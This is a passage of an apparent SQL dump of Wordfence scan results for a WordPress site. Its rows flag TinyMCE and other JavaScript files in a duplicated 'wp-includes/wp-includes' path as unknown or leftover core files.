More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/more.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27418,1631424931,1631424931,'new','knownfile',75,'a50dd5555268f032b65e29e1911cfc16','54a5db7879f6ab9317949c69c1963be3','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27419,1631424931,1631424931,'new','knownfile',75,'14a94b63c90a019ac1a28c9b1d89b8a8','b0d4707fee34b780201efee2cd54b331','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27420,1631424931,1631424931,'new','knownfile',75,'2e693c01fc606a57b574cfef4c5e336c','e926d248fbe094c3448603a39de69c63','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:76:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27421,1631424932,1631424932,'new','knownfile',75,'bd911d04b378b11165107d66cedd358a','9b1ae4bd68e469a1bec1788d080a1144','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:76:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27422,1631424932,1631424932,'new','knownfile',75,'602a2e777c86614ad7d1804e5311735b','70aa99035bca058b8b56fb6f4986a047','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/video.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/video.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27423,1631424932,1631424932,'new','knownfile',75,'fddd2ff254e445a39272774f6284910e','4d415996f4de1c4976d2ffe5525dd63c','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/wp-content.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/wp-content.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27424,1631424932,1631424932,'new','knownfile',75,'5e76c631d9ca2e9f70da71f926be533c','0ff33da5b042c49b7042dbd28f320ddb','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/themes/inlite/theme.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/tinymce/themes/inlite/theme.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27425,1631424932,1631424932,'new','knownfile',75,'96dd77aa91d3ec8eef53bcff9f531d6c','874530172640dd8d8bf9d96795ecfc8e','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/themes/inlite/theme.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/js/tinymce/themes/inlite/theme.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27426,1631424932,1631424932,'new','knownfile',75,'7b375ad95c4e9a2dea0d6c6e19217054','29ce188522227daaad72b18386d26a82','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/themes/modern/theme.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/tinymce/themes/modern/theme.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27427,1631424932,1631424932,'new','knownfile',75,'093b567c10c24ff8d12b652502f2537b','adfe735b079187c1db4a9ab204047b09','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/themes/modern/theme.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/js/tinymce/themes/modern/theme.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27428,1631424932,1631424932,'new','knownfile',75,'9bd457fe6088fbd9a6605e1ae5a5e677','59ff6bedcaf3e28f5f233446a9b91f09','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/tiny_mce_popup.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/tinymce/tiny_mce_popup.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27429,1631424932,1631424932,'new','knownfile',75,'d26a463dddb4bbe86096b63af42f9b54','3ad350473c931f1735b21f2d4b670a8a','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/tinymce.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/tinymce/tinymce.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27430,1631424932,1631424932,'new','knownfile',75,'f09e5cb700cfdca6c09241325e27388e','ebdb5a8612e3aaad5f7ff00e77f3bd8c','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/utils/editable_selects.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/js/tinymce/utils/editable_selects.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27431,1631424932,1631424932,'new','knownfile',75,'b4c070464cf53c5018a761a3a61a24af','e06d6068051859f8bb86b900d4883958','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/utils/form_utils.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/tinymce/utils/form_utils.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27432,1631424933,1631424933,'new','knownfile',75,'4d6ce3aef5c23a1c51bf9040f8a2713d','8b5f4faf57ee16a3b25ef54912f5ad7e','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/utils/mctabs.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/tinymce/utils/mctabs.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27433,1631424933,1631424933,'new','knownfile',75,'e8555de7788ffc9f14462512b6be37d2','88866b23777b473dab1ec5de562c4703','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/utils/validate.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/tinymce/utils/validate.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27434,1631424933,1631424933,'new','knownfile',75,'8f80496551912ddd155f84bb2cdce8a1','bfe53fe574ea27f24f9df5b095c89415','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/wp-tinymce.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/tinymce/wp-tinymce.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27435,1631424933,1631424933,'new','knownfile',75,'9a34613e1aec91b9f5de079fa2d4349e','6d37586ec34b928f634add5c5870b3aa','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/wp-tinymce.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/tinymce/wp-tinymce.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27436,1631424933,1631424933,'new','knownfile',25,'c11dfc9958445858443c19f8243cf193','e3a13e1b7256d6aa1b3888dc279cbcf8','Old WordPress core file not removed during update: wp-includes/wp-includes/js/tw-sack.js','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:37:\"wp-includes/wp-includes/js/tw-sack.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27437,1631424933,1631424933,'new','knownfile',75,'24b222302fde5f0423b7b4db6e5ea982','0cbea8616235a0117dda3db77ff899d5','Unknown file in WordPress core: wp-includes/wp-includes/js/tw-sack.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/tw-sack.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27438,1631424933,1631424933,'new','knownfile',75,'a142f1f23d915351dba914104310f106','b770df839931f3b67d7f0b3971ab9ae2','Unknown file in WordPress core: wp-includes/wp-includes/js/twemoji.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:37:\"wp-includes/wp-includes/js/twemoji.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27439,1631424933,1631424933,'new','knownfile',75,'703db5caf6e6ca83bf36d9b6a6e02b34','feff70237cc844074685c528926e259b','Unknown file in WordPress core: wp-includes/wp-includes/js/twemoji.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/twemoji.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27440,1631424933,1631424933,'new','knownfile',75,'15a4892f18553b89df26e2d902c83a4c','c7ed50dbe16a781b87b3ac07707ff131','Unknown file in WordPress core: wp-includes/wp-includes/js/underscore.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/js/underscore.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27441,1631424933,1631424933,'new','knownfile',75,'5fc1a0b9cbab9ddc88289ce5940bc10a','e1ad69b26fde01d37545166920d44dc7','Unknown file in WordPress core: wp-includes/wp-includes/js/underscore.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/underscore.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27442,1631424933,1631424933,'new','knownfile',75,'733efb2cf33d09850d9fbc447c41a5d8','e3dab25780acbbb83d864a6ac6173170','Unknown file in WordPress core: wp-includes/wp-includes/js/utils.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:35:\"wp-includes/wp-includes/js/utils.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27443,1631424934,1631424934,'new','knownfile',75,'c0df717d6f4db47628921fa6b8021856','b5173d5e013c1a63a6e763627709f124','Unknown file in WordPress core: wp-includes/wp-includes/js/utils.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/utils.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27444,1631424934,1631424934,'new','knownfile',75,'4de4ecd80563ddf57f6a3149d5f492b2','4446368b0338549bfe6d6feea10a3940','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-ajax-response.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/wp-ajax-response.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27445,1631424934,1631424934,'new','knownfile',75,'d0c38d8b0d4c34958e5c2b32514f3a7f','0fe887c80e94d328c165b9a62c825dbb','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-ajax-response.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/wp-ajax-response.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27446,1631424934,1631424934,'new','knownfile',75,'dbf3474c65f0d84bc1623525651ffa3d','c9a5cd1c1869fa2309e41ed206e09734','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-api.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/js/wp-api.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27447,1631424934,1631424934,'new','knownfile',75,'544461b4e87e251d2271989834abd8bb','086b7a9df32dc56b3c93ef31a48855dd','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-api.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/js/wp-api.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27448,1631424934,1631424934,'new','knownfile',75,'101ff5af1e4cbe1d84ce8b590bb799fb','837ab9a2205dcf6a347a465daf6c48d5','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-auth-check.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/wp-auth-check.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27449,1631424934,1631424934,'new','knownfile',75,'07d9deceb9afc49e7439aae14b780ae7','e307f6f70e63f765792d0d14cd3c9760','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-auth-check.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/wp-auth-check.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27450,1631424934,1631424934,'new','knownfile',75,'cc59041e50093744299924d64c761cc4','bdde3d2cfdd894f8d64060efea6f6159','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-backbone.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/wp-backbone.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27451,1631424934,1631424934,'new','knownfile',75,'6ceb203597ef1fad1555b521387fed6f','43455a6729d6a9a121cc55f86a431038','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-backbone.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/wp-backbone.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27452,1631424934,1631424934,'new','knownfile',75,'a2a45574316f7e9a7963e1d97db9672a','bbe308fd432f07b4b397b3dce1c3e8de','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-custom-header.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/wp-custom-header.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27453,1631424934,1631424934,'new','knownfile',75,'236743e95b6a7df6deb06f4fc1cf2721','1369267d6c6c79563b016ddd295eb874','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-custom-header.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/wp-custom-header.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27454,1631424934,1631424934,'new','knownfile',75,'26b84fa263d877625006559f504e9b5f','8c21c48addae4b464a830d3c3feda791','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-embed-template.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/wp-embed-template.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27455,1631424934,1631424934,'new','knownfile',75,'f97f53cb7ba1b1002dc8ddaccd08b413','3e688d1f2390968adecf40142a9351bf','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-embed-template.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/wp-embed-template.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27456,1631424935,1631424935,'new','knownfile',75,'01553ab04975a27d4946e4965e27794c','0c77382e852ea603c99b2c8805a2d1e8','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-embed.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/wp-embed.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27457,1631424935,1631424935,'new','knownfile',75,'5611d41fb390afbdc0b719371e59ff9a','861b2b0750dcf210e46d6646dd13296d','Unknown file in WordPress core: wp-includes/wp-includes/js/wp-embed.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 